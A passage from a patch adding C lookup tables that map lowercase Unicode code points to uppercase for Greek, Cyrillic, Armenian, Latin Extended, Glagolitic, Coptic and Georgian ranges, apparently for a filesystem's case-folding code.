++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0386, 0x0388, 0x0389, 0x038a,
++	0x0000, 0x0391, 0x0392, 0x0393, 0x0394, 0x0395, 0x0396, 0x0397,
++	0x0398, 0x0399, 0x039a, 0x039b, 0x039c, 0x039d, 0x039e, 0x039f,
++	0x03a0, 0x03a1, 0x0000, 0x03a3, 0x03a4, 0x03a5, 0x03a6, 0x03a7,
++	0x03a8, 0x03a9, 0x03aa, 0x03ab, 0x038c, 0x038e, 0x038f, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x03cf,
++	0x0000, 0x03d8, 0x0000, 0x03da, 0x0000, 0x03dc, 0x0000, 0x03de,
++	0x0000, 0x03e0, 0x0000, 0x03e2, 0x0000, 0x03e4, 0x0000, 0x03e6,
++	0x0000, 0x03e8, 0x0000, 0x03ea, 0x0000, 0x03ec, 0x0000, 0x03ee,
++	0x0000, 0x0000, 0x03f9, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x03f7, 0x0000, 0x0000, 0x03fa, 0x0000, 0x0000, 0x0000, 0x0000,
++};
++
++static const wchar_t t2_04[256] = {
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0410, 0x0411, 0x0412, 0x0413, 0x0414, 0x0415, 0x0416, 0x0417,
++	0x0418, 0x0419, 0x041a, 0x041b, 0x041c, 0x041d, 0x041e, 0x041f,
++	0x0420, 0x0421, 0x0422, 0x0423, 0x0424, 0x0425, 0x0426, 0x0427,
++	0x0428, 0x0429, 0x042a, 0x042b, 0x042c, 0x042d, 0x042e, 0x042f,
++	0x0400, 0x0401, 0x0402, 0x0403, 0x0404, 0x0405, 0x0406, 0x0407,
++	0x0408, 0x0409, 0x040a, 0x040b, 0x040c, 0x040d, 0x040e, 0x040f,
++	0x0000, 0x0460, 0x0000, 0x0462, 0x0000, 0x0464, 0x0000, 0x0466,
++	0x0000, 0x0468, 0x0000, 0x046a, 0x0000, 0x046c, 0x0000, 0x046e,
++	0x0000, 0x0470, 0x0000, 0x0472, 0x0000, 0x0474, 0x0000, 0x0476,
++	0x0000, 0x0478, 0x0000, 0x047a, 0x0000, 0x047c, 0x0000, 0x047e,
++	0x0000, 0x0480, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x048a, 0x0000, 0x048c, 0x0000, 0x048e,
++	0x0000, 0x0490, 0x0000, 0x0492, 0x0000, 0x0494, 0x0000, 0x0496,
++	0x0000, 0x0498, 0x0000, 0x049a, 0x0000, 0x049c, 0x0000, 0x049e,
++	0x0000, 0x04a0, 0x0000, 0x04a2, 0x0000, 0x04a4, 0x0000, 0x04a6,
++	0x0000, 0x04a8, 0x0000, 0x04aa, 0x0000, 0x04ac, 0x0000, 0x04ae,
++	0x0000, 0x04b0, 0x0000, 0x04b2, 0x0000, 0x04b4, 0x0000, 0x04b6,
++	0x0000, 0x04b8, 0x0000, 0x04ba, 0x0000, 0x04bc, 0x0000, 0x04be,
++	0x0000, 0x0000, 0x04c1, 0x0000, 0x04c3, 0x0000, 0x04c5, 0x0000,
++	0x04c7, 0x0000, 0x04c9, 0x0000, 0x04cb, 0x0000, 0x04cd, 0x04c0,
++	0x0000, 0x04d0, 0x0000, 0x04d2, 0x0000, 0x04d4, 0x0000, 0x04d6,
++	0x0000, 0x04d8, 0x0000, 0x04da, 0x0000, 0x04dc, 0x0000, 0x04de,
++	0x0000, 0x04e0, 0x0000, 0x04e2, 0x0000, 0x04e4, 0x0000, 0x04e6,
++	0x0000, 0x04e8, 0x0000, 0x04ea, 0x0000, 0x04ec, 0x0000, 0x04ee,
++	0x0000, 0x04f0, 0x0000, 0x04f2, 0x0000, 0x04f4, 0x0000, 0x04f6,
++	0x0000, 0x04f8, 0x0000, 0x04fa, 0x0000, 0x04fc, 0x0000, 0x04fe,
++};
++
++static const wchar_t t2_05[256] = {
++	0x0000, 0x0500, 0x0000, 0x0502, 0x0000, 0x0504, 0x0000, 0x0506,
++	0x0000, 0x0508, 0x0000, 0x050a, 0x0000, 0x050c, 0x0000, 0x050e,
++	0x0000, 0x0510, 0x0000, 0x0512, 0x0000, 0x0514, 0x0000, 0x0516,
++	0x0000, 0x0518, 0x0000, 0x051a, 0x0000, 0x051c, 0x0000, 0x051e,
++	0x0000, 0x0520, 0x0000, 0x0522, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0531, 0x0532, 0x0533, 0x0534, 0x0535, 0x0536, 0x0537,
++	0x0538, 0x0539, 0x053a, 0x053b, 0x053c, 0x053d, 0x053e, 0x053f,
++	0x0540, 0x0541, 0x0542, 0x0543, 0x0544, 0x0545, 0x0546, 0x0547,
++	0x0548, 0x0549, 0x054a, 0x054b, 0x054c, 0x054d, 0x054e, 0x054f,
++	0x0550, 0x0551, 0x0552, 0x0553, 0x0554, 0x0555, 0x0556, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++};
++
++static const wchar_t t2_1d[256] = {
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0xa77d, 0x0000, 0x0000, 0x0000, 0x2c63, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++};
++
++static const wchar_t t2_1e[256] = {
++	0x0000, 0x1e00, 0x0000, 0x1e02, 0x0000, 0x1e04, 0x0000, 0x1e06,
++	0x0000, 0x1e08, 0x0000, 0x1e0a, 0x0000, 0x1e0c, 0x0000, 0x1e0e,
++	0x0000, 0x1e10, 0x0000, 0x1e12, 0x0000, 0x1e14, 0x0000, 0x1e16,
++	0x0000, 0x1e18, 0x0000, 0x1e1a, 0x0000, 0x1e1c, 0x0000, 0x1e1e,
++	0x0000, 0x1e20, 0x0000, 0x1e22, 0x0000, 0x1e24, 0x0000, 0x1e26,
++	0x0000, 0x1e28, 0x0000, 0x1e2a, 0x0000, 0x1e2c, 0x0000, 0x1e2e,
++	0x0000, 0x1e30, 0x0000, 0x1e32, 0x0000, 0x1e34, 0x0000, 0x1e36,
++	0x0000, 0x1e38, 0x0000, 0x1e3a, 0x0000, 0x1e3c, 0x0000, 0x1e3e,
++	0x0000, 0x1e40, 0x0000, 0x1e42, 0x0000, 0x1e44, 0x0000, 0x1e46,
++	0x0000, 0x1e48, 0x0000, 0x1e4a, 0x0000, 0x1e4c, 0x0000, 0x1e4e,
++	0x0000, 0x1e50, 0x0000, 0x1e52, 0x0000, 0x1e54, 0x0000, 0x1e56,
++	0x0000, 0x1e58, 0x0000, 0x1e5a, 0x0000, 0x1e5c, 0x0000, 0x1e5e,
++	0x0000, 0x1e60, 0x0000, 0x1e62, 0x0000, 0x1e64, 0x0000, 0x1e66,
++	0x0000, 0x1e68, 0x0000, 0x1e6a, 0x0000, 0x1e6c, 0x0000, 0x1e6e,
++	0x0000, 0x1e70, 0x0000, 0x1e72, 0x0000, 0x1e74, 0x0000, 0x1e76,
++	0x0000, 0x1e78, 0x0000, 0x1e7a, 0x0000, 0x1e7c, 0x0000, 0x1e7e,
++	0x0000, 0x1e80, 0x0000, 0x1e82, 0x0000, 0x1e84, 0x0000, 0x1e86,
++	0x0000, 0x1e88, 0x0000, 0x1e8a, 0x0000, 0x1e8c, 0x0000, 0x1e8e,
++	0x0000, 0x1e90, 0x0000, 0x1e92, 0x0000, 0x1e94, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x1ea0, 0x0000, 0x1ea2, 0x0000, 0x1ea4, 0x0000, 0x1ea6,
++	0x0000, 0x1ea8, 0x0000, 0x1eaa, 0x0000, 0x1eac, 0x0000, 0x1eae,
++	0x0000, 0x1eb0, 0x0000, 0x1eb2, 0x0000, 0x1eb4, 0x0000, 0x1eb6,
++	0x0000, 0x1eb8, 0x0000, 0x1eba, 0x0000, 0x1ebc, 0x0000, 0x1ebe,
++	0x0000, 0x1ec0, 0x0000, 0x1ec2, 0x0000, 0x1ec4, 0x0000, 0x1ec6,
++	0x0000, 0x1ec8, 0x0000, 0x1eca, 0x0000, 0x1ecc, 0x0000, 0x1ece,
++	0x0000, 0x1ed0, 0x0000, 0x1ed2, 0x0000, 0x1ed4, 0x0000, 0x1ed6,
++	0x0000, 0x1ed8, 0x0000, 0x1eda, 0x0000, 0x1edc, 0x0000, 0x1ede,
++	0x0000, 0x1ee0, 0x0000, 0x1ee2, 0x0000, 0x1ee4, 0x0000, 0x1ee6,
++	0x0000, 0x1ee8, 0x0000, 0x1eea, 0x0000, 0x1eec, 0x0000, 0x1eee,
++	0x0000, 0x1ef0, 0x0000, 0x1ef2, 0x0000, 0x1ef4, 0x0000, 0x1ef6,
++	0x0000, 0x1ef8, 0x0000, 0x1efa, 0x0000, 0x1efc, 0x0000, 0x1efe,
++};
++
++static const wchar_t t2_1f[256] = {
++	0x1f08, 0x1f09, 0x1f0a, 0x1f0b, 0x1f0c, 0x1f0d, 0x1f0e, 0x1f0f,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x1f18, 0x1f19, 0x1f1a, 0x1f1b, 0x1f1c, 0x1f1d, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x1f28, 0x1f29, 0x1f2a, 0x1f2b, 0x1f2c, 0x1f2d, 0x1f2e, 0x1f2f,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x1f38, 0x1f39, 0x1f3a, 0x1f3b, 0x1f3c, 0x1f3d, 0x1f3e, 0x1f3f,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x1f48, 0x1f49, 0x1f4a, 0x1f4b, 0x1f4c, 0x1f4d, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x1f59, 0x0000, 0x1f5b, 0x0000, 0x1f5d, 0x0000, 0x1f5f,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x1f68, 0x1f69, 0x1f6a, 0x1f6b, 0x1f6c, 0x1f6d, 0x1f6e, 0x1f6f,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x1fba, 0x1fbb, 0x1fc8, 0x1fc9, 0x1fca, 0x1fcb, 0x1fda, 0x1fdb,
++	0x1ff8, 0x1ff9, 0x1fea, 0x1feb, 0x1ffa, 0x1ffb, 0x0000, 0x0000,
++	0x1f88, 0x1f89, 0x1f8a, 0x1f8b, 0x1f8c, 0x1f8d, 0x1f8e, 0x1f8f,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x1f98, 0x1f99, 0x1f9a, 0x1f9b, 0x1f9c, 0x1f9d, 0x1f9e, 0x1f9f,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x1fa8, 0x1fa9, 0x1faa, 0x1fab, 0x1fac, 0x1fad, 0x1fae, 0x1faf,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x1fb8, 0x1fb9, 0x0000, 0x1fbc, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x1fcc, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x1fd8, 0x1fd9, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x1fe8, 0x1fe9, 0x0000, 0x0000, 0x0000, 0x1fec, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x1ffc, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++};
++
++static const wchar_t t2_21[256] = {
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x2132, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x2160, 0x2161, 0x2162, 0x2163, 0x2164, 0x2165, 0x2166, 0x2167,
++	0x2168, 0x2169, 0x216a, 0x216b, 0x216c, 0x216d, 0x216e, 0x216f,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x2183, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++};
++
++static const wchar_t t2_24[256] = {
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x24b6, 0x24b7, 0x24b8, 0x24b9, 0x24ba, 0x24bb, 0x24bc, 0x24bd,
++	0x24be, 0x24bf, 0x24c0, 0x24c1, 0x24c2, 0x24c3, 0x24c4, 0x24c5,
++	0x24c6, 0x24c7, 0x24c8, 0x24c9, 0x24ca, 0x24cb, 0x24cc, 0x24cd,
++	0x24ce, 0x24cf, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++};
++
++static const wchar_t t2_2c[256] = {
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x2c00, 0x2c01, 0x2c02, 0x2c03, 0x2c04, 0x2c05, 0x2c06, 0x2c07,
++	0x2c08, 0x2c09, 0x2c0a, 0x2c0b, 0x2c0c, 0x2c0d, 0x2c0e, 0x2c0f,
++	0x2c10, 0x2c11, 0x2c12, 0x2c13, 0x2c14, 0x2c15, 0x2c16, 0x2c17,
++	0x2c18, 0x2c19, 0x2c1a, 0x2c1b, 0x2c1c, 0x2c1d, 0x2c1e, 0x2c1f,
++	0x2c20, 0x2c21, 0x2c22, 0x2c23, 0x2c24, 0x2c25, 0x2c26, 0x2c27,
++	0x2c28, 0x2c29, 0x2c2a, 0x2c2b, 0x2c2c, 0x2c2d, 0x2c2e, 0x0000,
++	0x0000, 0x2c60, 0x0000, 0x0000, 0x0000, 0x023a, 0x023e, 0x0000,
++	0x2c67, 0x0000, 0x2c69, 0x0000, 0x2c6b, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x2c72, 0x0000, 0x0000, 0x2c75, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x2c80, 0x0000, 0x2c82, 0x0000, 0x2c84, 0x0000, 0x2c86,
++	0x0000, 0x2c88, 0x0000, 0x2c8a, 0x0000, 0x2c8c, 0x0000, 0x2c8e,
++	0x0000, 0x2c90, 0x0000, 0x2c92, 0x0000, 0x2c94, 0x0000, 0x2c96,
++	0x0000, 0x2c98, 0x0000, 0x2c9a, 0x0000, 0x2c9c, 0x0000, 0x2c9e,
++	0x0000, 0x2ca0, 0x0000, 0x2ca2, 0x0000, 0x2ca4, 0x0000, 0x2ca6,
++	0x0000, 0x2ca8, 0x0000, 0x2caa, 0x0000, 0x2cac, 0x0000, 0x2cae,
++	0x0000, 0x2cb0, 0x0000, 0x2cb2, 0x0000, 0x2cb4, 0x0000, 0x2cb6,
++	0x0000, 0x2cb8, 0x0000, 0x2cba, 0x0000, 0x2cbc, 0x0000, 0x2cbe,
++	0x0000, 0x2cc0, 0x0000, 0x2cc2, 0x0000, 0x2cc4, 0x0000, 0x2cc6,
++	0x0000, 0x2cc8, 0x0000, 0x2cca, 0x0000, 0x2ccc, 0x0000, 0x2cce,
++	0x0000, 0x2cd0, 0x0000, 0x2cd2, 0x0000, 0x2cd4, 0x0000, 0x2cd6,
++	0x0000, 0x2cd8, 0x0000, 0x2cda, 0x0000, 0x2cdc, 0x0000, 0x2cde,
++	0x0000, 0x2ce0, 0x0000, 0x2ce2, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++};
++
++static const wchar_t t2_2d[256] = {
++	0x10a0, 0x10a1, 0x10a2, 0x10a3, 0x10a4, 0x10a5, 0x10a6, 0x10a7,
++	0x10a8, 0x10a9, 0x10aa, 0x10ab, 0x10ac, 0x10ad, 0x10ae, 0x10af,
++	0x10b0, 0x10b1, 0x10b2, 0x10b3, 0x10b4, 0x10b5, 0x10b6, 0x10b7,
++	0x10b8, 0x10b9, 0x10ba, 0x10bb, 0x10bc, 0x10bd, 0x10be, 0x10bf,
++	0x10c0, 0x10c1, 0x10c2, 0x10c3, 0x10c4, 0x10c5, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
